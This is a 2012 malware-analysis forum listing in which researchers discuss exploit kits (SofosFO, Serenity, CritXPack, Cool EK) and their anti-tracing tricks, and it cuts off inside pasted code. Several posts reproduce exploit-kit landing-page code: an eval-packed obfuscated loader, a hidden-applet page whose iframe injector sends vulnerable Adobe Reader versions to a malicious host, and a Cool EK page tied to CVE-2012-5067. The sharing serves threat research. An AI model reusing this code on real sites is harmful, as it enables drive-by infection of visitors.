Recent Posts

Pages: 1 ... 8 9 [10]
91
Malware Analysis / ProPack exploit kit
« Last post by SysAdMini on November 27, 2012, 06:52:12 am »
Meet ProPack Exploit Pack - yes that's a lot of pack
http://malware.dontneedcoffee.com/2012/11/meet-propack-exploit-pack.html

92
Malware Analysis / Nice trick on datasheetz.com
« Last post by SysAdMini on November 26, 2012, 02:04:14 pm »
A suspicious url was being blocked by web filtering software. Referrer was datasheetz.com.
I looked at the code of datasheetz.com. At a first glance there was nothing suspicious to find.



It took me some time to figure out where the suspicious url came from.
Look at the final script statement at the end of the page code.

Line

Code: [Select]
<script src="www.google-analytics.com/urchin.js" type="text/javascript"></script>
looks unsuspiciously, because it looks like a normal Google Analytics requests. But it's the key.
The url is missing the http:// statement. That means that the url is relative to the current url - actually

hxxp://datasheetz.com/www.google-analytics.com/urchin.js

There you can find the code creating the supicious url.





I don't get any content from that url. Please let me know if you get something. Url changes occasionally.

93
Malware Analysis / How SofosFO exploit kit operators prevent tracing
« Last post by SysAdMini on November 23, 2012, 05:39:18 pm »
Whenever I detect an infection, I try to trace the infection chain. Today I came across an interesting case.
I found an infection by a SofosFO exploit kit.
Operators of this kit take multiple precautions to prevent tracing by Infosec researchers.

Step by step.

Measurement 1 - Referrer

We start at compromised site brainbox-and-co.com. This site contains a link to an external script at

hxxp://systemnetworkscripts.org/1/ad.php?id=8.

Requesting the script directly returns 404 only. You have to specify a referrer in order to get the script.




Measurement 2 - Cookie and user agent check




Script sets a cookie 'phpsessid312'. If you request the script a second time, it would stop here if the cookie exists.
The script additionally checks if the visitor is running Internet Explorer on Windows.
Only using a IE user agent takes you to next step.

Script generates a dynamic iframe leading to

hxxp://sexcliphunter.net

Measurement 3 and 4  - ip check and redirection to a unique url

sexcliphunter.net checks visitor's ip address. It returns 404 if you visit the site more than once.
Only the first visit redirects to the exploit kit.

A unique url is being generated that can be used only once.



Measurement 5 - short DNS TTL

DNS TTL has been set to 30 seconds.



All these measurements make it more difficult to trace this exploit kit.




94
Malware Analysis / Deobfuscating BlackHole V2 HTML Pages with Python
« Last post by SysAdMini on November 19, 2012, 05:33:57 pm »
http://hooked-on-mnemonics.blogspot.it/2012/10/deobfuscating-blackhole-v2-html-pages.html

95
Malware Analysis / Serenity exploit pack
« Last post by SysAdMini on November 16, 2012, 01:52:14 pm »
http://www.malekal.com/2012/11/16/en-serenity-exploit-pack/

http://www.xylibox.com/2012/11/serenity-exploit-kit.html

example code:
Code: [Select]
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN'                     'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html><head><title>Loading... Please wait</title><meta name="robots" content="noindex"></head><body>
<script language='Javascript'>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('7 t={n:\'O\',m:\'\\P\\Z\\19\\1b\\1c\\18\\10\\Q\\1e\\R\\Y\\V\\17+/\\U\',J:C(8){7 5=\'\';7 x,v,y;7 w,q,f,s;7 i=0;8=8.T(/[^A-W-S-9\\+\\/\\=]/g,\'\');L(i<8.h){w=b.m.o(8.p(i++));q=b.m.o(8.p(i++));f=b.m.o(8.p(i++));s=b.m.o(8.p(i++));x=(w<<2)|(q>>4);v=((q&15)<<4)|(f>>2);y=((f&3)<<6)|s;5=5+d.a(x);r(f!=K){5=5+d.a(v)}r(s!=K){5=5+d.a(y)}}5=t.M(5);F 5},I:C(B){7 u=\'\';11(7 i=0,z=0;i<B.h;i=i+3,z++){u+=d.a(B.H(i,i+3)-b.n.H(z%b.n.h,z%b.n.h+1).j(0))}F t.J(u)},M:C(e){7 l=\'\';7 i=0;7 c=0,X=0,k=0,E=0;L(i<e.h){c=e.j(i);r(c<1d){l+=d.a(c);i++}G r((c>13)&&(c<1a)){k=e.j(i+1);l+=d.a(((c&16)<<6)|(k&D));i+=2}G{k=e.j(i+1);E=e.j(i+2);l+=d.a(((c&15)<<12)|((k&D)<<6)|(E&D));i+=3}}F l}};N(t.I(\'14\'));',62,77,'|||||RuhYcmNT||var|nqoKFiwXp||fromCharCode|this||String|utftext|ZXeURptUX||length||charCodeAt|c2|string|LjmKBCgSfg|opwiiu2ajja|indexOf|charAt|jIVsyYrqwr|if|lTgefPgHfPR|BwPQbuavg|bvvjiiwja|HtniPcZRx|VoSmJcCp|QAqukpG|mDGAUUlzcHx|||str|function|63|c3|return|else|substring|owpajjsu|jaHyuBvmNo|64|while|_utf8_jaHyuBvmNo|eval|cDKYlvsM|u0041BCD|u0061bcd|u006blmnopqrstuvw|z0|replace|u003d|u003234|Za|c1|u0078yz01|u0045|u0058YZ|for||191|199118183206198189172128175177132206206189172181189136124211208189185198199135178201187168205126197177153137205205172194172137153200198205193191180155157207197227201164189156149211205205172194174135183144208227185198172139183211191205168199199139145204206189201184179155165193206190193185178119165193207223181127189156149211205205172194179155128138206189234132196155164200208168223194189139132140184225185183199139183139198204219157188177187197197169196189200119165193207223181183197118128137207227172192179155128138206189234132199140149142209168193195197178157210206168234134197177161140181187185183199139183139198204219157188177187197197169196188173116145195207227172158181137164206193187197148173189182144210205193181199139153200183189200189200119123164205205204188172155153207206228197198197118194201209169197198200156191195206168168125198177132204188205168185199189141155197169197189199177161178192168189190189155153137183185215158181137164206193189197186180119157210206185214189178119124195197206197183196135179197183206231198189156157138207227167132201156123164205205204188188118132206208190189195197135183144205206193151197178153137197205235192189155156146208190189126189152191139198206189199196155132206188205193195197178157210206168234194181118161137194227201198198118183207206228192188174151128211207189235189199135178199184185214189178119165197207228193189197118127146208227201198198118183207206226230196187151128211207189235189199135178199188201214189178119165197207228193189197118127146207189185198198118161160206189172181199135179139198206189199196155132206195240185177174152191210198206197126198177127192208227201198198118183207206224231134201155161204207168201132201156123164198228201194188119157201206168167180183153157155189239218189200119165193207223181196179155157207197169201193189155128137184227193198189155145137198203201192189155124197206228196188173118132194205227201183199135174201187169180194198118161137189206197125198177183194208206197185174135175201198185214192198135182144207185168199189156157155208190197198196155149138208189200188173118153204197206193199196155156199184185215183197140153201198186227144181136182139189240200126177173123139186203184199175152144209190186180193178152178211189201163196176137152208186187205145176174183159185240204187174152191137207228223132199177145210181190184134198135128157207227201181199139161169197227227185188119156200182168164199200139124204185223168166183153195162194188197158173189194199182239222132199177145210181190188134198135128157207227201181199139161169197227227185188119156200182167193188189155195204184225185196198139195201197168185125196155132206182239234187173189182144208227185198172140152146207185168145198177161193208189201157188177187197197169196188173118145196206168197182175178153137207227201181197151174204182239214189178119157210209206231199175178157142207189200134176152191209184227172196189155127200182166215147185135174204182168219125199140140143184239172128196155127205197205164196198189128197208201172191176139165198182168215185199135128208205190180124189174123209182239235186188155195211198201222132198151128211198205168184174135182144207239168195198139161206183185222132198189128177207227223125189151179209184228189185198119141207206228193185180177132196209201222132199177145210181190196180179151140199184227205126197177153137205205172194172140153137197206189125174135183144192203197143180189178201187168223186174139128193208227223187188156157207207223168190188156165193190205168181188177195197198185218189173173165157205189201183196116145196206168189185185177161210207168223195197173178201188186163130175174152201209168197195188119161205198205168125175178175210205206197185174135174145197206181196197139161137181189185198188118179201208227200134172177165201206189201199175118195207197205196195188118132205197227171194196177145210181223181183197118157197188201189190188156165193185223168143178152148209187202185181188151148192208168223184199139178146181224196196176135148192205189201189189118179137188201188125176136140194188224235196188156149193206201181194188155124197188201189184188156157193181223181127188155195138198202163182196140157137207186226195175119175201206223164181197156141211184227201126175118190208198227204187189118161137184228181188198136132198188202204182175190127145207189185198188155123192206227185193189152123194198189185125188152148194181190205181197140161197188201189188199140157208187228164185197140153197181189223186174137153200198205193191180155157207197227201164189156149211205205172194174135182145188202222194176189183144198189172183199155124197206228196194199119149201208189200188173190195201198228189181197155160192207169189183179151149198205205235185198189132204206168185184175118195201197228196194198139179208181223181188189155183199205190196134172174156208185185188180199118183196208189218134172174156208185185188180189178149193206205201182197119149196198206188134172174140194181190193183198177132204206189223194189190123194206227171182179174194207205205205198188155124197188223214189178119124197206190193185172139183198183189168181199177183199197206197195198173128202197206205181181155128193197227235185189135178201183206231184197118153138206205201194199135128140207227223125189151178199188189185196198139195197208185181181198177153200205206205185179151149198205205235185198189132204206168185184175118153207206205189195175177187193207223188180188118132196198202163182196177145139197202188194180152182210185202222197188155144194181190215189189140157200188201188125176136140194181189219185196155175200208186163182177136140208181224167133198139145210197205163180197177145205198202163182189139145137197201188180199177145204208205200134172177179137208190180131175189132140205205167193188155124208207239168185199151132203185189205186173118175197208185168196196140140136198224163127172173131132188190181181198177145205181189168181197155160146181227197181199139144210181223181127188155195138198202163182196140157137207186227134201149136150||31|u00356789|u0056W|u0046GHIJKLMN|224|u004fPQR|u0053TU|128|u0065fghij'.split('|'),0,{}))
</script></body></html>
96
This and That / How I can contribute?
« Last post by quietous on November 15, 2012, 05:36:47 pm »
I'm new at MDL and want to help. How do I find malicious sites? Is there a MDL plug in I can use, or a MDL crawler program can run? Or there are other programs I can use to find malicious sites and submit them to MDL? Thank you for your efforts.
97
Compromised Servers / Don't look for jobs on this website!
« Last post by walterab on November 14, 2012, 03:29:47 pm »
Got a Risky Alert on 212.5.131.213.btc.net.bg (Bulgaria) while surfing in the Cloud.
98
Malware Analysis / CritXPack exploit kit (Previously Vintage Pack)
« Last post by SysAdMini on November 12, 2012, 10:20:36 pm »
http://malware.dontneedcoffee.com/2012/11/meet-critxpack-previously-vintage-pack.html



example code:

Code: [Select]
<html><head><script src="js/pd.js"></script></head><body><div style="visibility:hidden"><applet code="a.Test" archive="j.php?t=u0059u0053u0072u0074u0031u0072u0046u0074u0031u0031" width="1" height="1"><param name="oh" value="dXXOszzLFjHiXZ9diHFO6f9UHjzlD5###YBzoUFf9OdORiM4DDSF4DDr#4DD1r4DDr#pXUPi=M4DDrS4DDrA4DDrr4DDr#4DD1A4DDrW4DD1Sp"></applet></div><script>function ifr(abc){var dh = document.createElement("iframe");dh.setAttribute("width", 1);dh.setAttribute("height", 1);dh.setAttribute("src", abc);document.body.appendChild(dh);};function pdf(){try{PluginDetect.getVersion('.');var inp = PluginDetect.getVersion('AdobeReader').split('.');var pdfver = parseInt(inp[0]+inp[1]+inp[2]);if((pdfver>=800&&pdfver<=820)||(pdfver>=900&&pdfver<=930)){ifr("http://magrety.herapid.org/b081112s/p5.php?t=u0059u0053u0072u0074u0031u0072u0046u0074u0031u0031&oh=ZFhYT3N6ekxGakhpWFo5ZGlIRk82ZjlVSGp6bEQ1IyMjWUJ6b1VGZjlPZE9SaU00RERBRDRERHJTNEREcnJwWFVQaT1NNEREclM0RERyQTRERHJyNEREciM0REQxQTRERHJXNEREMVNw");}if (pdfver >= 600 && pdfver < 800){ifr("http://magrety.herapid.org/b081112s/p3.php?t=u0059u0053u0072u0074u0031u0072u0046u0074u0031u0031&oh=ZFhYT3N6ekxGakhpWFo5ZGlIRk82ZjlVSGp6bEQ1IyMjWUJ6b1VGZjlPZE9SaU00RERBRDRERHJTNEREcnJwWFVQaT1NNEREclM0RERyQTRERHJyNEREciM0REQxQTRERHJXNEREMVNw");}} catch(e){}}setTimeout(pdf,3000);</script></body></html>
99
Malware Analysis / Re: Cool Exploit Kit
« Last post by SysAdMini on November 11, 2012, 08:14:56 pm »
Cool EK : "Hello my friend..." CVE-2012-5067
http://malware.dontneedcoffee.com/2012/11/cool-ek-hello-my-friend-cve-2012-5067.html

example code:

Code: [Select]
<html>
<head>
<title>Hello my friend...</title>
<style>@font-face{font-family:'p1';src:url('../32size_font.eot');}.duqu{font-size:5px;line-height:normal;font-family:'p1';position:absolute;top:0px;left:0px;}</style>
</head>
<body onload='try{window.focus();}catch(e){}'>
<div class="duqu">:)</div>
<script>
var PluginDetect={version:"0.7.9",name:"PluginDetect",handler:function(c,b,a){return function(){c(b,a)}},openTag:"<",isDefined:function(b){return typeof b!="undefined"},isArray:function(b){return(/array/i).test(Object.prototype.toString.call(b))},isFunc:function(b){return typeof b=="function"},isString:function(b){return typeof b=="string"},isNum:function(b){return typeof b=="number"},isStrNum:function(b){return(typeof b=="string"&&(/\d/).test(b))},getNumRegx:/[\d][\d\.\_,-]*/,splitNumRegx:/[\.\_,-]/g,getNum:function(b,c){var d=this,a=d.isStrNum(b)?(d.isDefined(c)?new RegExp(c):d.getNumRegx).exec(b):null;return a?a[0]:null},compareNums:function(h,f,d){var e=this,c,b,a,g=parseInt;if(e.isStrNum(h)&&e.isStrNum(f)){if(e.isDefined(d)&&d.compareNums){return d.compareNums(h,f)}c=h.split(e.splitNumRegx);b=f.split(e.splitNumRegx);for(a=0;a<Math.min(c.length,b.length);a++){if(g(c[a],10)>g(b[a],10)){return 1}if(g(c[a],10)<g(b[a],10)){return -1}}}return 0},formatNum:function(b,c){var d=this,a,e;if(!d.isStrNum(b)){return null}if(!d.isNum(c)){c=4}c--;e=b.replace(/\s/g,"").split(d.splitNumRegx).concat(["0","0","0","0"]);for(a=0;a<4;a++){if(/^(0+)(.+)$/.test(e[a])){e[a]=RegExp.$2}if(a>c||!(/\d/).test(e[a])){e[a]="0"}}return e.slice(0,4).join(",")},$$hasMimeType:function(a){return function(c){if(!a.isIE&&c){var f,e,b,d=a.isArray(c)?c:(a.isString(c)?[c]:[]);for(b=0;b<d.length;b++){if(a.isString(d[b])&&/[^\s]/.test(d[b])){f=navigator.mimeTypes[d[b]];e=f?f.enabledPlugin:0;if(e&&(e.name||e.description)){return f}}}}return null}},findNavPlugin:function(l,e,c){var j=this,h=new RegExp(l,"i"),d=(!j.isDefined(e)||e)?/\d/:0,k=c?new RegExp(c,"i"):0,a=navigator.plugins,g="",f,b,m;for(f=0;f<a.length;f++){m=a[f].description||g;b=a[f].name||g;if((h.test(m)&&(!d||d.test(RegExp.leftContext+RegExp.rightContext)))||(h.test(b)&&(!d||d.test(RegExp.leftContext+RegExp.rightContext)))){if(!k||!(k.test(m)||k.test(b))){return a[f]}}}return null},getMimeEnabledPlugin:function(k,m,c){var e=this,f,b=new RegExp(m,"i"),h="",g=c?new RegExp(c,"i"):0,a,l,d,j=e.isString(k)?[k]:k;for(d=0;d<j.length;d++){if((f=e.hasMimeType(j[d]))&&(f=f.enabledPlugin)){l=f.description||h;a=f.name||h;if(b.test(l)||b.test(a)){if(!g||!(g.test(l)||g.test(a))){return f}}}}return 0},getPluginFileVersion:function(f,b){var h=this,e,d,g,a,c=-1;if(h.OS>2||!f||!f.version||!(e=h.getNum(f.version))){return b}if(!b){return e}e=h.formatNum(e);b=h.formatNum(b);d=b.split(h.splitNumRegx);g=e.split(h.splitNumRegx);for(a=0;a<d.length;a++){if(c>-1&&a>c&&d[a]!="0"){return b}if(g[a]!=d[a]){if(c==-1){c=a}if(d[a]!="0"){return b}}}return e},AXO:window.ActiveXObject,getAXO:function(a){var f=null,d,b=this,c={};try{f=new b.AXO(a)}catch(d){}return f},convertFuncs:function(f){var a,g,d,b=/^[\$][\$]/,c=this;for(a in f){if(b.test(a)){try{g=a.slice(2);if(g.length>0&&!f[g]){f[g]=f[a](f);delete f[a]}}catch(d){}}}},initObj:function(e,b,d){var a,c;if(e){if(e[b[0]]==1||d){for(a=0;a<b.length;a=a+2){e[b[a]]=b[a+1]}}for(a in e){c=e[a];if(c&&c[b[0]]==1){this.initObj(c,b)}}}},initScript:function(){var d=this,a=navigator,h,i=document,l=a.userAgent||"",j=a.vendor||"",b=a.platform||"",k=a.product||"";d.initObj(d,["$",d]);for(h in d.Plugins){if(d.Plugins[h]){d.initObj(d.Plugins[h],["$",d,"$$",d.Plugins[h]],1)}}d.convertFuncs(d);d.OS=100;if(b){var g=["Win",1,"Mac",2,"Linux",3,"FreeBSD",4,"iPhone",21.1,"iPod",21.2,"iPad",21.3,"Win.*CE",22.1,"Win.*Mobile",22.2,"Pocket\s*PC",22.3,"",100];for(h=g.length-2;h>=0;h=h-2){if(g[h]&&new RegExp(g[h],"i").test(b)){d.OS=g[h+1];break}}};d.head=i.getElementsByTagName("head")[0]||i.getElementsByTagName("body")[0]||i.body||null;d.isIE=new Function("return/*@cc_on!@*/!1")();d.verIE=d.isIE&&(/MSIE\s*(\d+\.?\d*)/i).test(l)?parseFloat(RegExp.$1,10):null;d.ActiveXEnabled=false;if(d.isIE){var h,m=["Msxml2.XMLHTTP","Msxml2.DOMDocument","Microsoft.XMLDOM","ShockwaveFlash.ShockwaveFlash","TDCCtl.TDCCtl","Shell.UIHelper","Scripting.Dictionary","wmplayer.ocx"];for(h=0;h<m.length;h++){if(d.getAXO(m[h])){d.ActiveXEnabled=true;break}}};d.isGecko=(/Gecko/i).test(k)&&(/Gecko\s*\/\s*\d/i).test(l);d.verGecko=d.isGecko?d.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(l)?RegExp.$1:"0.9"):null;d.isChrome=(/Chrome\s*\/\s*(\d[\d\.]*)/i).test(l);d.verChrome=d.isChrome?d.formatNum(RegExp.$1):null;d.isSafari=((/Apple/i).test(j)||(!j&&!d.isChrome))&&(/Safari\s*\/\s*(\d[\d\.]*)/i).test(l);d.verSafari=d.isSafari&&(/Version\s*\/\s*(\d[\d\.]*)/i).test(l)?d.formatNum(RegExp.$1):null;d.isOpera=(/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(l);d.verOpera=d.isOpera&&((/Version\s*\/\s*(\d+\.?\d*)/i).test(l)||1)?parseFloat(RegExp.$1,10):null;d.addWinEvent("load",d.handler(d.runWLfuncs,d))},init:function(d){var c=this,b,d,a={status:-3,plugin:0};if(!c.isString(d)){return a}if(d.length==1){c.getVersionDelimiter=d;return a}d=d.toLowerCase().replace(/\s/g,"");b=c.Plugins[d];if(!b||!b.getVersion){return a}a.plugin=b;if(!c.isDefined(b.installed)){b.installed=null;b.version=null;b.version0=null;b.getVersionDone=null;b.pluginName=d}c.garbage=false;if(c.isIE&&!c.ActiveXEnabled&&d!=="java"){a.status=-2;return a}a.status=1;return a},fPush:function(b,a){var c=this;if(c.isArray(a)&&(c.isFunc(b)||(c.isArray(b)&&b.length>0&&c.isFunc(b[0])))){a.push(b)}},callArray:function(b){var c=this,a;if(c.isArray(b)){for(a=0;a<b.length;a++){if(b[a]===null){return}c.call(b[a]);b[a]=null}}},call:function(c){var b=this,a=b.isArray(c)?c.length:-1;if(a>0&&b.isFunc(c[0])){c[0](b,a>1?c[1]:0,a>2?c[2]:0,a>3?c[3]:0)}else{if(b.isFunc(c)){c(b)}}},$$isMinVersion:function(a){return function(h,g,d,c){var e=a.init(h),f,b=-1,j={};if(e.status<0){return e.status}f=e.plugin;g=a.formatNum(a.isNum(g)?g.toString():(a.isStrNum(g)?a.getNum(g):"0"));if(f.getVersionDone!=1){f.getVersion(g,d,c);if(f.getVersionDone===null){f.getVersionDone=1}}a.cleanup();if(f.installed!==null){b=f.installed<=0.5?f.installed:(f.installed==0.7?1:(f.version===null?0:(a.compareNums(f.version,g,f)>=0?1:-0.1)))};return b}},getVersionDelimiter:",",$$getVersion:function(a){return function(g,d,c){var e=a.init(g),f,b,h={};if(e.status<0){return null};f=e.plugin;if(f.getVersionDone!=1){f.getVersion(null,d,c);if(f.getVersionDone===null){f.getVersionDone=1}}a.cleanup();b=(f.version||f.version0);b=b?b.replace(a.splitNumRegx,a.getVersionDelimiter):b;return b}},cleanup:function(){var a=this;if(a.garbage&&a.isDefined(window.CollectGarbage)){window.CollectGarbage()}},addWinEvent:function(d,c){var e=this,a=window,b;if(e.isFunc(c)){if(a.addEventListener){a.addEventListener(d,c,false)}else{if(a.attachEvent){a.attachEvent("on"+d,c)}else{b=a["on"+d];a["on"+d]=e.winHandler(c,b)}}}},winHandler:function(d,c){return function(){d();if(typeof c=="function"){c()}}},WLfuncs0:[],WLfuncs:[],runWLfuncs:function(a){var b={};a.winLoaded=true;a.callArray(a.WLfuncs0);a.callArray(a.WLfuncs);if(a.onDoneEmptyDiv){a.onDoneEmptyDiv()}},winLoaded:false,$$onWindowLoaded:function(a){return function(b){if(a.winLoaded){a.call(b)}else{a.fPush(b,a.WLfuncs)}}},$$onDetectionDone:function(a){return function(h,g,c,b){var d=a.init(h),k,e,j={};if(d.status==-3){return -1}e=d.plugin;if(!a.isArray(e.funcs)){e.funcs=[]}if(e.getVersionDone!=1){k=a.isMinVersion?a.isMinVersion(h,"0",c,b):a.getVersion(h,c,b)}if(e.installed!=-0.5&&e.installed!=0.5){a.call(g);return 1}if(e.NOTF){a.fPush(g,e.funcs);return 0}return 1}},div:null,divID:"plugindetect",divWidth:50,pluginSize:1,emptyDiv:function(){var d=this,b,h,c,a,f,g;if(d.div&&d.div.childNodes){for(b=d.div.childNodes.length-1;b>=0;b--){c=d.div.childNodes[b];if(c&&c.childNodes){for(h=c.childNodes.length-1;h>=0;h--){g=c.childNodes[h];try{c.removeChild(g)}catch(f){}}}if(c){try{d.div.removeChild(c)}catch(f){}}}}if(!d.div){a=document.getElementById(d.divID);if(a){d.div=a}}if(d.div&&d.div.parentNode){try{d.div.parentNode.removeChild(d.div)}catch(f){}d.div=null}},DONEfuncs:[],onDoneEmptyDiv:function(){var c=this,a,b;if(!c.winLoaded){return}if(c.WLfuncs&&c.WLfuncs.length&&c.WLfuncs[c.WLfuncs.length-1]!==null){return}for(a in c){b=c[a];if(b&&b.funcs){if(b.OTF==3){return}if(b.funcs.length&&b.funcs[b.funcs.length-1]!==null){return}}}for(a=0;a<c.DONEfuncs.length;a++){c.callArray(c.DONEfuncs)}c.emptyDiv()},getWidth:function(c){if(c){var a=c.scrollWidth||c.offsetWidth,b=this;if(b.isNum(a)){return a}}return -1},getTagStatus:function(m,g,a,b){var c=this,f,k=m.span,l=c.getWidth(k),h=a.span,j=c.getWidth(h),d=g.span,i=c.getWidth(d);if(!k||!h||!d||!c.getDOMobj(m)){return -2}if(j<i||l<0||j<0||i<0||i<=c.pluginSize||c.pluginSize<1){return 0}if(l>=i){return -1}try{if(l==c.pluginSize&&(!c.isIE||c.getDOMobj(m).readyState==4)){if(!m.winLoaded&&c.winLoaded){return 1}if(m.winLoaded&&c.isNum(b)){if(!c.isNum(m.count)){m.count=b}if(b-m.count>=10){return 1}}}}catch(f){}return 0},getDOMobj:function(g,a){var f,d=this,c=g?g.span:0,b=c&&c.firstChild?1:0;try{if(b&&a){d.div.focus()}}catch(f){}return b?c.firstChild:null},setStyle:function(b,g){var f=b.style,a,d,c=this;if(f&&g){for(a=0;a<g.length;a=a+2){try{f[g[a]]=g[a+1]}catch(d){}}}},insertDivInBody:function(i,g){var f,c=this,h="pd33993399",b=null,d=g?window.top.document:window.document,a=d.getElementsByTagName("body")[0]||d.body;if(!a){try{d.write('<div id="'+h+'">.'+c.openTag+"/div>");b=d.getElementById(h)}catch(f){}}a=d.getElementsByTagName("body")[0]||d.body;if(a){a.insertBefore(i,a.firstChild);if(b){a.removeChild(b)}}},insertHTML:function(f,b,g,a,k){var l,m=document,j=this,p,o=m.createElement("span"),n,i;var c=["outlineStyle","none","borderStyle","none","padding","0px","margin","0px","visibility","visible"];var h="outline-style:none;border-style:none;padding:0px;margin:0px;visibility:visible;";if(!j.isDefined(a)){a=""}if(j.isString(f)&&(/[^\s]/).test(f)){f=f.toLowerCase().replace(/\s/g,"");p=j.openTag+f+' width="'+j.pluginSize+'" height="'+j.pluginSize+'" ';p+='style="'+h+'display:inline;" ';for(n=0;n<b.length;n=n+2){if(/[^\s]/.test(b[n+1])){p+=b[n]+'="'+b[n+1]+'" '}}p+=">";for(n=0;n<g.length;n=n+2){if(/[^\s]/.test(g[n+1])){p+=j.openTag+'param name="'+g[n]+'" value="'+g[n+1]+'" />'}}p+=a+j.openTag+"/"+f+">"}else{p=a}if(!j.div){i=m.getElementById(j.divID);if(i){j.div=i}else{j.div=m.createElement("div");j.div.id=j.divID}j.setStyle(j.div,c.concat(["width",j.divWidth+"px","height",(j.pluginSize+3)+"px","fontSize",(j.pluginSize+3)+"px","lineHeight",(j.pluginSize+3)+"px","verticalAlign","baseline","display","block"]));if(!i){j.setStyle(j.div,["position","absolute","right","0px","top","0px"]);j.insertDivInBody(j.div)}}if(j.div&&j.div.parentNode){j.setStyle(o,c.concat(["fontSize",(j.pluginSize+3)+"px","lineHeight",(j.pluginSize+3)+"px","verticalAlign","baseline","display","inline"]));try{o.innerHTML=p}catch(l){};try{j.div.appendChild(o)}catch(l){};return{span:o,winLoaded:j.winLoaded,tagName:f,outerHTML:p}}return{span:null,winLoaded:j.winLoaded,tagName:"",outerHTML:p}},file:{$:1,any:"fileStorageAny999",valid:"fileStorageValid999",save:function(d,f,c){var b=this,e=b.$,a;if(d&&e.isDefined(c)){if(!d[b.any]){d[b.any]=[]}if(!d[b.valid]){d[b.valid]=[]}d[b.any].push(c);a=b.split(f,c);if(a){d[b.valid].push(a)}}},getValidLength:function(a){return a&&a[this.valid]?a[this.valid].length:0},getAnyLength:function(a){return a&&a[this.any]?a[this.any].length:0},getValid:function(c,a){var b=this;return c&&c[b.valid]?b.get(c[b.valid],a):null},getAny:function(c,a){var b=this;return c&&c[b.any]?b.get(c[b.any],a):null},get:function(d,a){var c=d.length-1,b=this.$.isNum(a)?a:c;return(b<0||b>c)?null:d[b]},split:function(g,c){var b=this,e=b.$,f=null,a,d;g=g?g.replace(".","\."):"";d=new RegExp("^(.*[^\/])("+g+"\s*)$");if(e.isString(c)&&d.test(c)){a=(RegExp.$1).split("/");f={name:a[a.length-1],ext:RegExp.$2,full:c};a[a.length-1]="";f.path=a.join("/")}return f},z:0},Plugins:{java:{mimeType:["application/x-java-applet","application/x-java-vm","application/x-java-bean"],classID:"clsid:8AD9C840-044E-11D1-B3E9-00805F499D93",navigator:{a:window.navigator.javaEnabled(),javaEnabled:function(){return this.a},mimeObj:0,pluginObj:0},OTF:null,minIEver:7,debug:0,debugEnable:function(){var a=this,b=a.$;a.debug=1},isDisabled:{$:1,DTK:function(){var a=this,c=a.$,b=a.$$;if((c.isGecko&&c.compareNums(c.verGecko,c.formatNum("1.6"))<=0)||(c.isSafari&&c.OS==1&&(!c.verSafari||c.compareNums(c.verSafari,"5,1,0,0")<0))||c.isChrome||(c.isIE&&!c.ActiveXEnabled)){return 1}return 0},AXO:function(){var a=this,c=a.$,b=a.$$;return(!c.isIE||!c.ActiveXEnabled||(!b.debug&&b.DTK.query().status!==0))},navMime:function(){var b=this,d=b.$,c=b.$$,a=c.navigator;if(d.isIE||!a.mimeObj||!a.pluginObj){return 1}return 0},navPlugin:function(){var b=this,d=b.$,c=b.$$,a=c.navigator;if(d.isIE||!a.mimeObj||!a.pluginObj){return 1}return 0},windowDotJava:function(){var a=this,c=a.$,b=a.$$;if(!window.java){return 1}if(c.OS==2&&c.verOpera&&c.verOpera<9.2&&c.verOpera>=9){return 1}return 0},allApplets:function(){var b=this,d=b.$,c=b.$$,a=c.navigator;if(d.OS>=20){return 0}if(d.verOpera&&d.verOpera<11&&!a.javaEnabled()&&!c.lang.System.getProperty()[0]){return 1}if((d.verGecko&&d.compareNums(d.verGecko,d.formatNum("2"))<0)&&!a.mimeObj&&!c.lang.System.getProperty()[0]){return 1}return 0},AppletTag:function(){var b=this,d=b.$,c=b.$$,a=c.navigator;return d.isIE?!a.javaEnabled():0},ObjectTag:function(){var a=this,c=a.$,b=a.$$;return c.isIE?!c.ActiveXEnabled:0},z:0},getVerifyTagsDefault:function(){var a=this,c=a.$,b=[1,0,1];if(c.OS>=20){return b}if((c.isIE&&(c.verIE<9||!c.ActiveXEnabled))||(c.verGecko&&c.compareNums(c.verGecko,c.formatNum("2"))<0)||(c.isSafari&&(!c.verSafari||c.compareNums(c.verSafari,c.formatNum("4"))<0))||(c.verOpera&&c.verOpera<10)){b=[1,1,1]}return b},getVersion:function(j,g,i){var b=this,d=b.$,e,a=b.applet,h=b.verify,k=b.navigator,f=null,l=null,c=null;if(b.getVersionDone===null){b.OTF=0;k.mimeObj=d.hasMimeType(b.mimeType);if(k.mimeObj){k.pluginObj=k.mimeObj.enabledPlugin}if(h){h.begin()}}a.setVerifyTagsArray(i);d.file.save(b,".jar",g);if(b.getVersionDone===0){if(a.should_Insert_Query_Any()){e=a.insert_Query_Any();b.setPluginStatus(e[0],e[1],f)}return}if((!f||b.debug)&&b.DTK.query().version){f=b.DTK.version}if((!f||b.debug)&&b.navMime.query().version){f=b.navMime.version}if((!f||b.debug)&&b.navPlugin.query().version){f=b.navPlugin.version}if((!f||b.debug)&&b.AXO.query().version){f=b.AXO.version}if(b.nonAppletDetectionOk(f)){c=f}if(!c||b.debug||a.VerifyTagsHas(2.2)||a.VerifyTagsHas(2.5)){e=b.lang.System.getProperty();if(e[0]){f=e[0];c=e[0];l=e[1]}}b.setPluginStatus(c,l,f);if(a.should_Insert_Query_Any()){e=a.insert_Query_Any();if(e[0]){c=e[0];l=e[1]}}b.setPluginStatus(c,l,f)},nonAppletDetectionOk:function(b){var d=this,e=d.$,a=d.navigator,c=1;if(!b||(!a.javaEnabled()&&!d.lang.System.getPropertyHas(b))||(!e.isIE&&!a.mimeObj&&!d.lang.System.getPropertyHas(b))||(e.isIE&&!e.ActiveXEnabled)){c=0}else{if(e.OS>=20){}else{if(d.info&&d.info.getPlugin2Status()<0&&d.info.BrowserRequiresPlugin2()){c=0}}}return c},setPluginStatus:function(d,f,a){var 